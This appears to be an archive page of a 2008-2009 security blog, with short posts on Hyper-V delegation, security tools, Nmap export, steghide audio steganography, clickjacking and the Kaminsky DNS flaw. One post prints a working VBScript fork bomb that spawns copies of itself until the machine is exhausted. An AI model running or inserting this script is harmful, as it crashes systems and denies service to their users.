Security Archives - Page 11 of 14

Archive for the ‘Security’ Category

Delegating management in Hyper-V

Posted March 11, 2009 by Wolf Goerlich

Separation of duties is a concept we keep coming back to. One individual (or one group) should not have full authority to complete a process. This goes hand-in-hand with least privilege. Any one individual (or group) should have just enough system privileges to complete their portion of the process, and no more. In the realm of server virtualization, this means dividing up duties between those who manage the hypervisor, those who manage the vms, and those who manage the guest computers.

In Hyper-V, you can delegate permission to manage or monitor the vms separately from managing the hypervisor. To do so, use the Authorization Manager console (AzMan.msc) to edit the \ProgramData\Microsoft\Windows\Hyper-V\InitialStore.xml configuration file. Create a Windows security group first, then use AzMan.msc to create a role, specify tasks, and assign the role to the security group.

For step-by-step instructions, please see Microsoft’s documentation.

Configure Hyper-V for Role-based Access Control

http://technet.microsoft.com/en-us/library/dd283076(WS.10).aspx

Fun Stuff — Wireshark, L0phtcrack, Netcat

Posted March 2, 2009 by Wolf Goerlich

Wireshark was updated last month. “Updated Protocol Support: AFS, ATM, DHCPv6, DIS, E.212, RTP, UDP, USB, WCCP, WPS.” This is excellent as I have been playing around with IPv6 more, and the DHCPv6 and UDP enhancements will be a big help. They also fixed the multi-monitor issue that has been plaguing my setup. I am now running on the latest.

http://www.wireshark.org/news/20090206.html

L0phtCrack is making a come back. “More than two years after Symantec pulled the plug on L0phtCrack, the venerable password cracking tool is being prepped for a return to the spotlight. The original creators of L0phtCrack has reacquired the tool with plans to release a new version at next week’s SOURCE Boston conference.”

http://blogs.zdnet.com/security/?p=2737

There are also rumors that the L0pht crack folks, Peiter “Mudge” Zatko and Chris “Weld Pond” Wysopal, are working on a 64-bit release of Netcat. While it is debatable whether 32-bit and 64-bit versions will bring any performance boost in connectivity and cryptography, it does get me one step closer to my goal of running only 64-bit code on my notebook.

http://netcat.sourceforge.net/

It is a very exciting week.

Security is Design

Posted January 2, 2009 by Wolf Goerlich

Welcome to 2009, and welcome back to my blog. This year’s focus is on using network architecture to create information security.

I come to this after reading some reports from Gartner Group: Three Lenses Into Information Security; Classifying and Prioritizing Software Vulnerabilities; and Aligning Security Architecture and Enterprise Architecture: Best Practices.

The first report posits that designing or architecting security is one of three lenses thru which to view InfoSec (the other two being process-focused and control-focused). Why this emphasis on architecture? The primary reason is that most vulnerabilities are not within the software themselves, but within your implementation.

“Gartner estimates that, today, 75% of successful attacks exploit configuration mistakes.” Furthermore, few of us have the skills, time, and license to modify the software to address the remaining 25% of the vulnerabilities. Thus the largest positive impact an InfoSec professional can have on security is thru planning and architecting the system design.

The secondary reason is that retrofitting system architectures with security after the fact is time intensive and service invasive. It often requires stopping work during the change implementation. It may require altering the work after implementation. This has a tangible cost. Gartner puts it thusly: “The careful application of security architecture principles will ensure the optimum level of protection at the minimum cost.”

The bottom line is that emphasizing security architecture in the original design minimizes costs and vulnerabilities.

Nmap output to XML and SQL

Posted November 28, 2008 by Wolf Goerlich

The Nmap port scanner has a handful of output options. It has its own proprietary format (-oN). If you want to play with the data, you can use XML output (-oX) or grep text files (-oG). The -oA will export in all three formats.

Why export to XML or grepable text? Typically, because you want to audit several IP hosts and store the results in a database.

A quicker method is to use the Nmap::Parser module with a Perl script. This method comes courtesy of Anthony Persaud. His Nmap-Parser automates reading the XML output and writing to SQL tables. MySQL and SQLite are both supported. Nmap-Parser is now up to version 1.19.

Use case: nightly IP scans of a subnet along with TCP scans of select hosts, as part of a security information management process.

Tip: Cygwin for Steganography in Sounds (.wav)

Posted October 25, 2008 by Wolf Goerlich

Cygwin can be used for hiding data in sound files.

First, run setup and select the “steghide: A steganography hiding tool” package under the Security category. You may also be prompted to install libjpeg7 and mhash. Complete the installation.

Second, copy your hidden file and cover file to the home folder (C:\cygwin\home\Administrator). For example, suppose we use “hidden.msg” and “applause.wav” to embed a text message inside a file of folks clapping. Let’s use the word “secret” as the passphrase.

$ steghide –embed –embedfile hidden.msg –coverfile applause.wav –passphrase secret –stegofile output.wav

embedding “hidden.msg” in “applause.wav”… done
writing stego file “output.wav”… done

The resulting “output.wav” file now contains the message. To extract, we use steghide with the passphrase.

$ steghide –extract –stegofile output.wav –passphrase secret –extractfile output.msg

wrote extracted data to “output.msg”.

That is how to use steghide in Cygwin to embed and extract files from sound files (.wav).

Clickjacking Revealed

Posted October 18, 2008 by Wolf Goerlich

The “Clickjacking” attack bothers me because it seems so obvious. Well, obvious to someone who has done JavaScript web development.

Years ago, I worked on a web user interface (wui) where we tried to duplicate all the functionality of a gui using Javascript and XML. This was Ajax before it was called Ajax. I had a demo that basically was a clickjack attack whose intent was to annoy the user or to trigger an event. A prank or a feature, it was trivial to implement with a few lines of code.

Thus the attack is another case of media hype. Giving this attack a clever name like “Clickjacking” seems to be like calling a person who unplugs your network cable a “Cablejacker”.

J Wolfgang Goerlich

(Incidentally, in case anyone is interested, my employer attempted to patent the wui idea. The details are online.)
http://www.freepatentsonline.com/y2003/0088640.html?query=Goerlich&stemming=on

VBScript Fork Bomb

Posted September 26, 2008 by Wolf Goerlich

I have been playing around with VBScript. I thought I would make a quick fork bomb, just for fun. “The fork bomb, a form of denial-of-service attack against a computer system, implements the fork operation (or equivalent functionality) whereby a running process can create another running process.” (Wikipedia)

Do until true = false
 CreateObject("Wscript.Shell").Run Wscript.ScriptName
Loop

London Stock Exchange – When Good Systems Go Bad

Posted September 8, 2008 by Wolf Goerlich

“The London Stock Exchange suffered its worst systems failure in eight years on Monday, forcing the world’s third largest share market to suspend trading for about seven hours and infuriating its users. (…) Monday’s trading suspension was the longest suffered by the exchange since April 5, 2000, when problems with an older trading system led to an eight-hour suspension.”

London Stock Exchange crippled by system outage
http://www.reuters.com/article/ousiv/idUSL01084620080908

The Exchange uses LSE TradElect, a Microsoft .Net application that runs on Windows and SQL Server. What surprises me is that they did not elect to go into DR. From an earlier press release, the TradElect “platform has been designed to the highest levels of resilience with comprehensive back up, which includes dual processing at two sites and recovery from component failure within a second.”

DNS Cache Polution

Posted July 28, 2008 by Wolf Goerlich

Much news is being made of the DNS flaw identified by Dan Kaminsky. McAfee Avert Labs Blog has the most succinct description of the problem.

The vulnerability essentially comes from DNS servers using UDP and predictable port sequences during recursive queries. An attacker can guess the next port and respond to the query with a false address. The DNS server accepts the forged attack, and www.mybank.com becomes the attacker’s IP address in its cache. It will respond to client requests for www.mybank.com with the forged information.

This can be quite a concern as the website, if properly duplicated, will look exactly the same to the end-user. What happens next is largely up what the attacker intends to do. The most common follow-up would be a phishing attack, wherein the website simply gathers people’s banking credentials. Bruce Schneier wrote a recent Wired article on this flaw. Schneier makes an excellent point. “Stop assuming that systems are secure unless demonstrated insecure; start assuming that systems are insecure unless designed securely.”

Related Links:

Dan Kaminsky: DNS Checker
http://www.doxpara.com/?page_id=1159

Lesson From the DNS Bug: Patching Isn’t Enough by Bruce Schneier
http://www.wired.com/politics/security/commentary/securitymatters/2008/07/securitymatters_0723

Would you hire an ethical hacker?

Posted July 21, 2008 by Wolf Goerlich

Hackers are not some ominous bad guys. For many years, I have been trying to explain this to family and friends, my staff, my colleagues and auditors. I use words like “criminal” or “attacker” in my memos and emails. Hackers have long been given a bad rap.

That rap is implicit in the question: would you hire an ethical hacker? Bank robbing and espionage may be crimes, but hacking? Linking the work ethical to hacking gives us an opportunity to highlight the difference between a talented unconventional IT wiz and someone practicing digital breaking-and-entering.